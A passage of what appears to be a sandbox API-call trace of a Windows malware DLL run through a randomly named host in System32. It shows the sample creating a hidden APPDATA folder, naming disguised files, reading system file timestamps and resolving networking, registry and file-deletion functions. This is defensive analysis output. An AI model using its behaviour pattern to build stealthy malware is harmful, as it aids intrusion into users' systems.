GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.919] SetLastError (dwErrCode=0x0) [0036.919] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.920] SetLastError (dwErrCode=0x0) [0036.920] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.921] GetLastError () returned 0x0 [0036.921] SetLastError (dwErrCode=0x0) [0036.922] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0036.922] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0036.922] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0036.923] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf650 | out: lpSystemTimeAsFileTime=0x1cf650*(dwLowDateTime=0xe3b07db0, dwHighDateTime=0x1d3dfba)) [0036.923] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1cf588, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.923] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1cf470, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.923] GetLastError () returned 0x0 [0036.923] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetLastError () returned 0x0 [0036.924] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.924] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0036.924] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.924] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.924] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.924] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.924] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0036.925] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0036.925] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0036.925] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0036.925] GetLastError () returned 0xb7 [0036.925] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0036.925] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0036.925] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0036.925] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0036.925] wsprintfA (in: param_1=0x1cf2f0, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.925] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0036.925] wsprintfA (in: param_1=0x1cf1ec, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0036.925] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.925] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0036.925] CloseHandle (hObject=0x74) returned 1 [0036.926] GetLastError () returned 0x0 [0036.926] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0036.926] GetLastError () returned 0x0 [0036.926] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0036.926] GetSystemDirectoryA (in: lpBuffer=0x1cf2f0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0036.926] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0036.926] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0036.926] CloseHandle (hObject=0x74) returned 1 [0036.926] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.926] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.926] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0036.928] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0036.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0036.928] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0036.928] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0036.929] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0036.929] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0036.929] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0036.929] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0036.929] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0036.929] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0036.929] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0036.929] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0036.929] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0036.929] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0036.929] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0036.929] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0036.929] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0036.929] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0036.929] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0036.930] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0036.931] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0036.931] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0036.931] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0036.931] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0036.931] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0036.931] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0036.931] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0036.931] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0036.931] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0036.931] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0036.931] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0036.931] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0036.931] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0036.931] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0036.931] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0036.932] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0036.932] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0036.932] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0036.932] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0036.932] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0036.932] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0036.932] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0036.932] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0036.932] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0036.932] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0036.932] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0036.932] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0036.932] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0036.932] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.932] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.932] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0036.933] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0036.934] HeapDestroy (hHeap=0x790000) returned 1 Process: id = "72" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f380" os_pid = "0xeb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"%Temp%\\IXP000.TMP\\\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3148 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3149 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3150 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3151 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3152 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 3153 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3154 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3155 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3156 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 3157 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 3158 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3159 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3160 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3161 start_va = 0x490000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 3162 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3163 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3164 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3165 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3166 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3167 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3168 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3169 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3170 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3171 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3172 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3173 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 3174 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 3175 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3176 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3177 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3178 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3179 start_va = 0x2b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 3180 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 3181 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3182 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 3183 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3184 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3185 start_va = 0x1200000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 3186 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3187 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3188 start_va = 0x1200000 end_va = 0x126ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 3189 start_va = 0x1360000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Thread: id = 161 os_tid = 0xeb4 [0036.996] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af95c | out: lpSystemTimeAsFileTime=0x2af95c*(dwLowDateTime=0xe3bc6490, dwHighDateTime=0x1d3dfba)) [0036.997] GetCurrentProcessId () returned 0xeb0 [0036.997] GetCurrentThreadId () returned 0xeb4 [0036.997] GetTickCount () returned 0x185d1 [0036.997] QueryPerformanceCounter (in: lpPerformanceCount=0x2af954 | out: lpPerformanceCount=0x2af954*=379841972) returned 1 [0036.997] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.998] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0036.998] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0036.998] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0036.998] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0036.998] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.998] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.998] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.998] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.998] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.998] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.999] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.999] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.999] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.999] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.999] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.999] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.999] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.999] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0037.000] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.000] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0037.000] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.000] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0037.000] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0037.000] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0037.000] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0037.001] GetCurrentThreadId () returned 0xeb4 [0037.001] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" 